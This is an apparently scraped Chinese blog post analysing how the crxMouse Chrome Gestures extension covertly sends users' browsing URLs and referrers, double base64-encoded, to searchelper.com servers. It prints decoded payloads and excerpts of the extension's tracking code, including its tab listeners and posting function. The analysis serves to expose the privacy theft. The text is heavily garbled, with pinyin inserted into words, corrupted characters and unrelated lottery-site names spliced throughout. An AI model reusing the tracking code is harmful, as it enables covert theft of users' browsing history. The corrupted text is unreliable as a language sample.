IT技術(shu)互動交流平台

浙江风采网官网

作者︰佚名  發(fa)布(bu)日期︰2020-02-28 22:42:28

 瀏覽器插件已經成為了(liao)瀏覽器的必(bi)備品(pin),但是市場上的插件也良莠不齊,甚(shen)至(zhi)部分插件切(qie)換(huan)用mei)?劍 玟 榔韉睦shi)記錄。筆(bi)者就(jiu)遇到了(liao)這(zhe)樣一個插件,就(jiu)是著名的手勢(shi)插件︰crxMouse Chrome Gestures,更(geng)可氣的是已經用了(liao)這(zhe)個插件一年多了(liao)。

浙江风采网官网

   用Google搜索crxMouse Chrome Gestures導向到google市場,可以看(kan)到這(zhe)款(kuan)插件的簡單介紹。

   原名:Gestures for Chrome(TM)漢化版.方便,快捷,充分zhi) 蚴蟊甑乃脅cao)作.功(gong)能包括:鼠標手勢(shi),超級拖(tuo)曳,滾輪手勢(shi),搖桿手勢(shi),平滑滾動,標簽(qian)頁列表等. 本擴展致力于通過(guo)鼠標來(lai)實現一些功(gong)能操(cao)作,充分挖掘鼠標的所有操(cao)作.

   功(gong)能包括:鼠標手勢(shi),超級拖(tuo)曳,滾輪手勢(shi),搖桿手勢(shi),平滑滾動,標簽(qian)頁列表等

   目前在google市場上這(zhe)款(kuan)插件有30萬的用mei)? lei)計評價5000,其中很(hen)大一部分是國內用mei)? 跋旎故欠fei)常廣泛的。

   google市場

浙江风采网官网

   通過(guo)wireshark抓包可以看(kan)到兩個分別發(fa)送到s808.searchelper.com和s1808.searchelper.com的請求,直接(jie)上圖︰

   s808服(fu)務請求

   從origin可以看(kan)出,請求是來(lai)源于瀏覽器插件,標記為︰jgiplclhploodgnkcljjgddajfbmafmp,可以通過(guo)chrome的chrome://extensions/找到該(gai)id對應的插件,就(jiu)是插件顯示,其對應的系統目錄為

   

C:Users[用mei)AppDataLocalGoogleChromeUser DataDefaultExtensionsjgiplclhploodgnkcljjgddajfbmafmp

   

   我們可以通過(guo)分析其代碼(ma)發(fa)現zhi)涫迪鄭 zhe)個後續(xu)再(zai)講(jiang)。細心的讀者可能會(hui)看(kan)到post請求段被加密了(liao),看(kan)結構像是base64,嘗試(shi)用base64解碼(ma),還是base64編碼(ma)格式,再(zai)次解碼(ma),得到如下(xia)數據︰

   

s=808&md=21&pid=SjOa3PgqWSHYapU&sess=314039255259558500&q=http://bbs.pediy.com/showthread.php?t=179524&prev=http://bbs.pediy.com/forumdisplay.php?f=161&link=1&sub=chrome&hreferer=http://bbs.pediy.com/forumdisplay.php?f=161&tmv=3015

   

   s=808就(jiu)代表著(zhou)服(fu)務器s808,pid即userid,sess是用mei)?鏡乇曇ession,sub代表著(zhou)瀏覽器類型,q代表當(dang)前頁面,prev代表著(zhou)從哪個頁面過(guo)來(lai),也就(jiu)是referer的作用,hreferer就(jiu)也bu)鍬甲zhou)referer字段有了(liao)這(zhe)些數據就(jiu)可以分析用mei) 形  梢怨┤閹饕yin)擎,其實百(bai)度統計和google統計也是干同(tong)樣的事(shi),甚(shen)至(zhi)百(bai)度統計還有點擊等的統計。就(jiu)這(zhe)樣你的瀏覽行為被發(fa)送給了(liao)其他服(fu)務器,這(zhe)不是最危險的,最危險的是你在瀏覽內網(wang)的一些頁面也會(hui)被發(fa)送出去,內網(wang)的一些站點就(jiu)很(hen)容(rong)易被泄露了(liao)。

   接(jie)著(zhou)我們看(kan)另外(wai)一個請求,這(zhe)個請求是發(fa)送到s1808服(fu)務器上,具體請求如下(xia)︰

   s1808服(fu)務器的請求

   解密加密後的內容(rong)和發(fa)送到s808的請求基本一致,具體如下(xia)︰

   

s=1808&md=21&pid=SjOa3PgqWSHYapU&sess=765877789119258500&sub=chrome&q=http%3A//bbs.pediy.com/showthread.php%3Ft%3D179524&hreferer=http%3A//bbs.pediy.com/forumdisplay.php%3Ff%3D161&prev=http%3A//bbs.pediy.com/forumdisplay.php%3Ff%3D161&tmv=4015&tmf=1

   

   這(zhe)里就(jiu)有點搞(gao)不太清楚發(fa)這(zhe)樣一個備份(fen)請求的原因了(liao),難道(dao)僅僅是備份(fen),有待思考,為了(liao)更(geng)好(hao)的弄(long)清楚該(gai)插件還有沒(mei)有其他危險行為,接(jie)下(xia)來(lai)我們分析插件的實現。

浙江风采网官网

   插件的惡意行為集中xing)palytics_ch.js代碼(ma)中,安裝後的初始化代碼(ma)︰

   

this.initOnceAfterInstall = function() { if (!utils.db.get("userid")) { var id = utils.createUserID(); utils.db.set("userid", id) } if (!utils.db.get("install_time")) { var now = (new Date).getTime() / 1E3; utils.db.set("install_time", now) } if (!utils.db_type.get("tmv")) { var now = (new Date).getTime() / 1E3; utils.db_type.set("tmv", SIM_ModuleConstants._TMV); }};

   

   在初始化中生(sheng)成userid,獲取(qu)install_time,twv字段存放在本地localstorage中,接(jie)著(zhou)會(hui)創建各種調用addListener接(jie)口(kou)來(lai)創建監听器,當(dang)tab頁更(geng)新,替換(huan),激活的時候就(jiu)會(hui)調用相應的請求發(fa)送tuo)嚶Φ暮 xtension_onRequest則是發(fa)送到s808服(fu)務器,tabs_onUpdated,tabs_onActivated,tabs_onReplaced則是發(fa)送請求到s1808服(fu)務器,具體代碼(ma)如下(xia)︰

   

this.start = function() { try { chrome.extension.onRequest.addListener(extension_onRequest); chrome.tabs.onUpdated.addListener(tabs_onUpdated); chrome.tabs.onActivated.addListener(tabs_onActivated); chrome.tabs.onReplaced.addListener(tabs_onReplaced) } catch (e) { log.SEVERE("8835", e) }}

 

   

   下(xia)面我們簡單分析下(xia)發(fa)送到s808.searchelper.com的related請求的代碼(ma),已簡化,簡化部分主要是去除一些google搜索的跳轉(zhuan),去除docType非(fei)html類型的,去除間隔時間很(hen)短(duan)的。

   

function extension_onRequest(request, sender, sendResponse) { var prev_state = tabs_states[tabId]; tabs_states[tabId] = change_status; if (res_prev_url == tab_url && prev_state != change_status){ log.ERROR("ERROR 8002 ??"); return } if(res_prev_url == null res_prev_url.length == 0) { res_prev_url = last_prev; } last_prev = tab_url; var data = "s=" + SIM_Config_BG.getSourceId() + "&md=21&pid=" + utils.db.get("userid") + "&sess=" + SIM_Session.getSessionId() + "&q=" + encodeURIComponent(tab_url) + "&prev=" + encodeURIComponent(res_prev_url) + "&link=" + (ref ? "1" : "0") + "&sub=" + SIM_ModuleConstants.BROWSER + "&hreferer=" + encodeURIComponent(ref); data = data + "&tmv=" + SIM_ModuleConstants._TMV; data = SIM_Base64.encode(SIM_Base64.encode(data)); data = "e=" + data; var url = utils.db_type.get("server") + "/related"; utils.net.post(url, "json", data, function(result) {  log.INFO("Succeeded in posting data");  tabs_prevs[tabId] = tab_url  }, function(httpCode) {  log.INFO("Failed to retrieve content. (HTTP Code:" + httpCode.status + ")");  log.ERROR("ERROR 8004 ??");  tabs_prevs[tabId] = tab_url  })}

   

   從上述代碼(ma)中可以看(kan)出在關(guan)鍵的瀏覽器當(dang)前url和referer都進行了(liao)兩次base64編碼(ma)處理,可以逃(tao)過(guo)一些普通用mei)?難劬Γ 訓dao)這(zhe)種zhi)絞僥芄歡愎guo)google的一些自動審查,比較好(hao)奇。

浙江风采网官网

   碼(ma)農也不容(rong)易,辛辛苦苦寫出來(lai)的程序不賺錢只(zhi)能靠竊取(qu)用mei)? 覽shi)發(fa)給第三方來(lai)獲取(qu)回報,想必(bi)也是迫不得已,當(dang)然對于這(zhe)種竊取(qu)隱私的mu)砸 di)制(zhi)。 mouse guesture作為一個很(hen)好(hao)用的特性(xing),筆(bi)者已經難以離開,所以在google市場上選(xuan)擇(ze)了(liao)其他的guesture插件。有了(liao)這(zhe)個教訓,相信大家(jia)以後使用瀏覽器插件肯定(ding)會(hui)多長一雙眼楮。

 

Tag標簽(qian)︰插件  瀏覽器  隱私  
  • 浙江风采网官网

About IT165 - 吉林快3官网廣告服(fu)務 - 隱私聲明 - 版權申明 - 免(mian)責(ze)條款(kuan) - 網(wang)站地圖 - 網(wang)友投稿 - 聯系方式
本站內容(rong)來(lai)自于互聯網(wang),僅供用于網(wang)絡(luo)技術(shu)學習(xi),學習(xi)中請遵(zun)循相關(guan)法(fa)律法(fa)規
浙江风采网官网 | 下一页